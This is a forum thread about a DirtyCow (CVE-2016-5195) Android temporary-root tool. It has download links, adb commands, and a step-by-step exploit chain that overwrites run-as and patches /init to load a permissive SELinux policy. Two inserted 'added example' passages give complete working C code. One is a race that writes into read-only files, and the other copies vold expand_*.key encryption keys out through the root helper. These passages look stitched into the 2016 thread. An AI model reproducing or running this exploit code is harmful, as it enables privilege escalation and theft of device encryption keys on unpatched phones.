Root tool DirtyCow Apk && adb

By kryz, Senior Member on 24th December 2016, 02:21 PM
Hi,
I have developed a tool to exploit the dirtycow vulnerability and get TEMPORARY ROOT.
It bypasses SELinux on Lollipop 32-bit systems only; we are working now on a 64-bit and Marshmallow version, which will come soon, but there is a lot of work to make it universal.
I'm bringing 2 tools: one APK (no computer required) and one RAR for adb and Linux.
With this tool we will access those partitions and start the attack there, but in the current state, if you have a locked bootloader, a good choice is to have root, even a temporary one.

·APK
Required: SD card
The APK exploits this vuln in the vold context, so it is necessary to have an SD card and to mount or extract it when the app asks, once per session.
This tool has some utilities to flash the boot and system partitions and to back them up, and 2 methods of root:
·Attack the init process (Lollipop 32-bit only)
·Attack app_process (all devices, not really good)

·Get root
Uninstall any SuperSU manager before rooting.
The way to use this app is to first click on "check perms" (optional), and you will see if you have permissions to the /init file.
If you have permissions and Lollipop 32-bit, you can use the first method to get root.
Also in "check permissions" you will see if you have rights to back up/flash the boot and system partitions.
The process takes up to 2 minutes to finish, so please wait and watch the log window.
# ISSUES #
If you get a reboot after getting root you can:
-Clean init (restoring the init process sometimes crashes the device, but it is safe)
-Install selinux permissive (makes the new SELinux policy permanent, not tested)
The first option is safe; at worst you just get a reboot.
The second option has only been tested on 3 devices (Oppo, Xperia, Moto E), so test it with a working recovery; it can break some SELinux rule.


·ADB
The adb RAR contains some utilities to get root via run-as and init, and it only works on Lollipop 32-bit.
To execute it:

-RAR password: "nox"
-Extract the RAR to /data/local/tmp/


Code:
chmod 755 /data/local/tmp/exploit.sh
cd /data/local/tmp/
./exploit.sh
This process takes some time, 1-2 minutes, but you will see the progress in the console; please wait.
Afterwards it will ask you to turn off Bluetooth; do it even though sometimes it is not required, as it can speed up the process.
It will ask to install selinux permissive; if you don't have reboot problems, don't install it. Otherwise be sure you have a working recovery and a stock ROM ready to flash; this feature is stable but needs more testing.
If all is OK you will see this:

Code:
#Type run-as -s1 to get a shell
#Type run-as -s2 to execute su daemon
run-as -s1 gives you a shell with the init context but with some restrictions, because SELinux auto-transitions the domain for run-as.
run-as -s2 will execute the su daemon and a su in the init context with no restrictions.
# ISSUES #
If you get a reboot after getting root you can:
·mount the system partition with the abort flag:
Code:
mount -o remount,abort /system
You won't be able to mount system in write mode.


This app is in BETA BETA state for now; 7/9 devices passed, not bad at all.
I'll add more devices to the list soon.

List of rooted devices:
Moto G 5.1 lollipop
Xperia 5.1 lollipop
Oppo 5.1 lollipop
Emulator 5.1 lollipop
XT1528 (MOTO E Verizon prepaid) 5.0.2 lollipop(reboot issues)
Asus Zenfone Go ZB452KG Lollipop(5.1.1)
Smartfren Andromax A / Haier a16c3h (Lollipop 5.1 Firmware 12.2)


Version:0.4
Adb:http://www.mediafire.com/file/r3i900...XPLOIT_ADB.rar
Apk:http://www.mediafire.com/file/38tysc...owt%282%29.apk
Implemented selinux permissive after reboot (adb, apk).
Enforcing mode working (adb, apk).

Version: 0.3
Fixed bug creating bl instruction.

Version: 0.2
-Fix bug in apk for some devices

Version: 0.1
-More compatible adb with Lollipop 32-bit.
-Fixed bug in the shellcode.
-64-bit version of run-as-dirtycow.

Todo:
-Working on Marshmallow 32-bit.
-Some fixes to the apk.

Thanks to n0x for his great help debugging the shellcode issue on the Moto G.
24th December 2016, 04:17 PM |#2  
Great work!

Waiting for 64-bit.
24th December 2016, 05:53 PM |#3  
I will gladly test with my V10. I've been able to get a temp root shell with dcow. Happy holidays!
24th December 2016, 06:04 PM |#4  
nemopsp
Sweet! Has anyone tested on the Note 4? N910A on 5.1.1

I'm currently on 6.0.1 MM, so I'm waiting for that release.

Anyone know if this will work with the November 2016 security patch?

24th December 2016, 06:50 PM |#5  
Really cool. I am having a problem trying to connect my device over adb wifi, and now this!!! I have a locked head unit and I can't install any apps (all installations blocked; developer mode and USB debugging all hidden). Is there any way for me to install this onto my phone and attack my device via Bluetooth or something? Or autorun once connected to USB? It's a long shot, but hey, it's Christmas!!

Merry Christmas by the way
25th December 2016, 11:25 AM |#6  
jucaroba
Can we have access to the run-as-dirtycow source code?

Thanks.
25th December 2016, 03:39 PM |#7  
kryz (OP)
Exploit process
For the developers that are testing this exploit or want to know how it works in depth:

First we dirtycow some privileged process; for example, run-as has suid 0, given by SELinux capabilities and not by the setuid bit.

When we have overwritten run-as, this binary can read the /init path, so we copy it to another place with our run-as "trojan".

In our run-as we need to put some code to read files; my run-as-dirtycow does:

Code:
run-as /init

This will print the file to stdout (console); if we redirect this output to a file:

Code:
run-as /init > /data/local/tmp/init.dmp

we copy the /init file through our dirtycowed run-as, which has root privileges and is permitted by SELinux.

We patch init.dmp to create our init.patch with a shellcode to load the new policy.

We will use run-as to dirtycow again, this time with our init.dmp patched with the shellcode.

So our run-as trojan will also contain the dirtycow exploit, and when we exec this binary with the right arguments it will also dirtycow any file that root has read permissions to.

Code:
run-as /init /data/local/tmp/init.patch

Once finished, and when the new policy is loaded, executing the run-as trojan with the special parameter -s1 or -s2 gives you a root shell or installs su on the device TEMPORARILY; it modifies no partition but mounts an ext4 partition on /system/xbin with the su binary.

Well, this is the process to do it in adb shell; in the APK I am using fsck_msdos to do all this chain of steps.

I would like to get some different inits from Lollipop 32-bit and Marshmallow 32-bit to adjust the patcher to Marshmallow.
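Every step of the chain above ("dirtycow run-as", "dirtycow /init again with init.patch") rests on one primitive: CVE-2016-5195, Dirty COW, a race in the kernel's copy-on-write handling that lets an unprivileged process put bytes into a file it can only read, because the write lands in the page cache instead of going through the file's permissions. The program below is an added example of that primitive, written for this page; it is not kryz's run-as-dirtycow and not code from the thread. It is a compact reimplementation in the style of the public dirtyc0w proof of concept (Linux, pthreads; build with gcc -pthread) that targets a constructed mode 0444 file under /tmp instead of run-as or /init. Two threads race madvise(MADV_DONTNEED) against a write to /proc/self/mem, and the result is checked by re-reading the file from disk, so on a patched kernel it reports the file unchanged and on a vulnerable one it reports that the payload landed. The names dirtycow(), payload_landed() and make_target() are mine.

```c
/* Added example, not the thread's tool: CVE-2016-5195 write primitive in the
 * style of the public dirtyc0w PoC. Assumes Linux with pthreads. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

struct race {
    void *map;           /* private, read-only mapping of the target file */
    const void *payload; /* bytes to place at offset 0 of the file */
    size_t len;
    volatile int stop;   /* set to end both loops */
    volatile int err;    /* set by a thread that could not start its work */
};

/* Thread A: throw the mapped page away again and again so the kernel has to
 * fault it back in, reopening the window between "break COW" and "write". */
static void *discard_loop(void *arg) {
    struct race *r = arg;
    while (!r->stop)
        madvise(r->map, r->len, MADV_DONTNEED);
    return NULL;
}

/* Thread B: write through /proc/self/mem, which uses FOLL_FORCE to break COW on
 * the read-only mapping. On a vulnerable kernel the retried page lookup can
 * hand the write the page-cache page itself, so the bytes reach the file
 * without any write permission on it. */
static void *write_loop(void *arg) {
    struct race *r = arg;
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0) { r->err = 1; r->stop = 1; return NULL; }
    while (!r->stop) {
        lseek(fd, (off_t)(uintptr_t)r->map, SEEK_SET);
        write(fd, r->payload, r->len);
    }
    close(fd);
    return NULL;
}

/* Check the file as stored, with a fresh read(). Looking at the mapping would
 * show the process-private COW copy and claim success even on a fixed kernel. */
int payload_landed(const char *path, const void *payload, size_t len) {
    int fd = open(path, O_RDONLY);
    if (fd < 0) return 0;
    char *buf = malloc(len);
    ssize_t n = read(fd, buf, len);
    close(fd);
    int hit = n == (ssize_t)len && memcmp(buf, payload, len) == 0;
    free(buf);
    return hit;
}

/* Race for at most rounds x 10 ms. Returns 1 if the payload is now in the file,
 * 0 if the kernel held (patched), -1 on setup failure. */
int dirtycow(const char *path, const void *payload, size_t len, int rounds) {
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || (size_t)st.st_size < len) { close(fd); return -1; }
    void *map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) { close(fd); return -1; }
    struct race r = { map, payload, len, 0, 0 };
    pthread_t a, b;
    if (pthread_create(&a, NULL, discard_loop, &r) != 0) r.err = 1;
    else if (pthread_create(&b, NULL, write_loop, &r) != 0) { r.err = 1; r.stop = 1; pthread_join(a, NULL); }
    int landed = 0;
    if (!r.err) {
        for (int i = 0; i < rounds && !landed && !r.stop; i++) {
            usleep(10000);
            landed = payload_landed(path, payload, len);
        }
        r.stop = 1;
        pthread_join(a, NULL);
        pthread_join(b, NULL);
    }
    munmap(map, st.st_size);
    close(fd);
    return r.err ? -1 : landed;
}

/* Constructed target: a mode 0444 file that even our own uid cannot write. */
int make_target(const char *path, const char *content) {
    unlink(path);
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0444);
    if (fd < 0) return -1;
    ssize_t n = write(fd, content, strlen(content));
    close(fd);
    return n == (ssize_t)strlen(content) ? 0 : -1;
}

int main(int argc, char **argv) {
    if (argc != 3) { fprintf(stderr, "usage: %s <read-only file> <payload>\n", argv[0]); return 2; }
    int r = dirtycow(argv[1], argv[2], strlen(argv[2]), 500);
    puts(r == 1 ? "payload landed: kernel is vulnerable" :
         r == 0 ? "file unchanged: kernel looks patched" : "setup failed");
    return r != 1;
}
```

Two practical points follow from the code. First, the verdict must come from read(), as payload_landed() does: after the write through /proc/self/mem the mapping itself shows the modified bytes on every kernel, because that is exactly the private copy COW is supposed to give you, so a check that looks at the mapping is a false positive on a patched device. Second, the primitive only rewrites bytes of pages that already exist, so a payload (the run-as trojan, in the thread's use) cannot be larger than the file it replaces and cannot grow it.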
25th December 2016, 03:45 PM |#8  
kryz (OP)
Quote:
Originally Posted by jucaroba

Can we have access to the run-as-dirtycow source code?

Thanks.

It is very simple: just take the original dirtycow exploit and some code to copy files, read and puts.

Anyway, soon I'll post it here; it has not many secrets lol, just copy file or execute sh. The main problem now is the patcher, to make it work on Marshmallow and 64-bit; I don't have any 64-bit device, just one Xperia Z where I can install a custom ROM with Marshmallow.

But I think the first thing is to check that the patcher is working well on Lollipop 32-bit; even though I've tested 2 devices and reversed some other inits, it is not enough to be completely sure that all is OK.
25th December 2016, 10:51 PM |#9  
jucaroba
Quote:
Originally Posted by kryz

It is very simple: just take the original dirtycow exploit and some code to copy files, read and puts.

Anyway, soon I'll post it here; it has not many secrets lol, just copy file or execute sh. The main problem now is the patcher, to make it work on Marshmallow and 64-bit; I don't have any 64-bit device, just one Xperia Z where I can install a custom ROM with Marshmallow.

But I think the first thing is to check that the patcher is working well on Lollipop 32-bit; even though I've tested 2 devices and reversed some other inits, it is not enough to be completely sure that all is OK.

Thanks for your answer.

I'm trying to use your exploit to be able to read my /data/misc/vold/expand_*.key file. My wife has a Moto G 2014 phone with official (non-rooted) Android 6 Marshmallow. The bootloader is locked. She has accidentally deleted all the pictures on her SD card, which is configured as an adopted card (not portable). I have made a cloned copy of the SD card on my Linux laptop with the dd command, but I cannot mount the partitions on the SD card because I have to know the encryption key.

I cannot unlock the bootloader, because the phone would be reset to factory and the encryption key would be deleted. And I cannot read the key file without being root, because of the permissions of the file. I have tried your run-as-dirtycow trojan on the phone, and I can read files I have no permissions for, such as /init.rc. The only missing piece now is that I don't know the exact name of the key file. I only know that it is of the form "expand_*.key". Can your trojan run-as-dirtycow be modified to be able to read the files with this name pattern in a given directory?

Thanks in advance.
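What jucaroba asks for above (reading /data/misc/vold/expand_*.key without knowing the exact file name) is a directory walk, not a new exploit step: once the dirtycowed run-as executes with root privileges, the trojan only needs code that enumerates a directory, matches names against a shell glob and copies the matches somewhere the adb shell user can read them. The program below is an added example of that read-and-copy helper, written in C for this page; it is not part of kryz's tool. The functions copy_matching(), copy_file() and demo() are mine, and demo() builds a constructed fixture under /tmp so the program runs without root. On a device the same copy_matching() would be called as copy_matching("/data/misc/vold", "expand_*.key", "/data/local/tmp") from inside the privileged helper.

```c
/* Added example, not from the thread: copy files matching a glob out of a
 * directory the caller can read. Meant as the file-read utility inside a
 * root-running helper; exercised here on a constructed fixture in /tmp. */
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <fnmatch.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Copy src to dst byte for byte. Returns 0 on success, -1 on error. */
static int copy_file(const char *src, const char *dst) {
    int in = open(src, O_RDONLY);
    if (in < 0) return -1;
    int out = open(dst, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (out < 0) { close(in); return -1; }
    char buf[65536];
    ssize_t n, rc = 0;
    while ((n = read(in, buf, sizeof buf)) > 0) {
        for (ssize_t off = 0; off < n; ) {
            ssize_t w = write(out, buf + off, n - off);
            if (w < 0) { rc = -1; break; }
            off += w;
        }
        if (rc) break;
    }
    if (n < 0) rc = -1;
    close(in);
    close(out);
    return (int)rc;
}

/* Enumerate dir (one level) and copy every regular file whose name matches the
 * shell glob pattern (e.g. "expand_*.key") into outdir under the same name.
 * Returns the number of files copied, or -1 if dir cannot be opened. */
int copy_matching(const char *dir, const char *pattern, const char *outdir) {
    DIR *d = opendir(dir);
    if (!d) return -1;
    int copied = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (fnmatch(pattern, e->d_name, 0) != 0) continue;
        char src[PATH_MAX], dst[PATH_MAX];
        snprintf(src, sizeof src, "%s/%s", dir, e->d_name);
        snprintf(dst, sizeof dst, "%s/%s", outdir, e->d_name);
        struct stat st;
        if (stat(src, &st) < 0 || !S_ISREG(st.st_mode)) continue;
        if (copy_file(src, dst) == 0) copied++;
    }
    closedir(d);
    return copied;
}

/* Constructed fixture: one key-like file and one decoy in a temp directory.
 * Returns 1 if exactly the matching file was copied with identical bytes. */
int demo(void) {
    char src[] = "/tmp/dcow_src_XXXXXX", out[] = "/tmp/dcow_out_XXXXXX";
    if (!mkdtemp(src) || !mkdtemp(out)) return 0;
    char p[PATH_MAX];
    snprintf(p, sizeof p, "%s/expand_1234abcd.key", src);
    FILE *f = fopen(p, "w");
    if (!f) return 0;
    fputs("constructed-key-bytes", f);
    fclose(f);
    snprintf(p, sizeof p, "%s/other.txt", src);
    f = fopen(p, "w");
    if (!f) return 0;
    fputs("decoy", f);
    fclose(f);
    if (copy_matching(src, "expand_*.key", out) != 1) return 0;
    snprintf(p, sizeof p, "%s/expand_1234abcd.key", out);
    f = fopen(p, "r");
    if (!f) return 0;
    char buf[64] = {0};
    fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    return strcmp(buf, "constructed-key-bytes") == 0;
}

int main(int argc, char **argv) {
    if (argc != 4) {
        fprintf(stderr, "usage: %s <dir> <glob> <outdir>   (no arguments: run demo)\n", argv[0]);
        return demo() ? 0 : 1;
    }
    int n = copy_matching(argv[1], argv[2], argv[3]);
    printf("%d file(s) copied\n", n);
    return n < 0;
}
```

Whether the copy succeeds on the phone depends on the SELinux domain the helper runs in, not just on uid 0; that is the distinction the thread draws between the restricted -s1 shell and the unrestricted -s2 init context, so the helper belongs in the latter.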
25th December 2016, 10:57 PM |#10  
tnomtlaw
Quote:
Originally Posted by kryz

It is very simple: just take the original dirtycow exploit and some code to copy files, read and puts.

Anyway, soon I'll post it here; it has not many secrets lol, just copy file or execute sh. The main problem now is the patcher, to make it work on Marshmallow and 64-bit; I don't have any 64-bit device, just one Xperia Z where I can install a custom ROM with Marshmallow.

But I think the first thing is to check that the patcher is working well on Lollipop 32-bit; even though I've tested 2 devices and reversed some other inits, it is not enough to be completely sure that all is OK.

I'm trying to root my Boost Max+ running 5.1. I tried the check perm option but couldn't remount the sdcard; it just froze. Upon reboot it hung at starting apps. I had to remove the sdcard to get the phone to boot properly.

25th December 2016, 11:10 PM |#11  
kryz (OP)
Quote:
Originally Posted by tnomtlaw

I'm trying to root my Boost Max+ running 5.1. I tried the check perm option but couldn't remount the sdcard; it just froze. Upon reboot it hung at starting apps. I had to remove the sdcard to get the phone to boot properly.

When you mount the sdcard it is normal that it doesn't mount again; the process hijacks fsck_msdos. You have to go back to the application, wait and watch the log window.

Depending on the mount it will take 1-5 seconds to see the information.

If you see that init is OK, you can proceed with the get root.

[Attached image: Perm logs]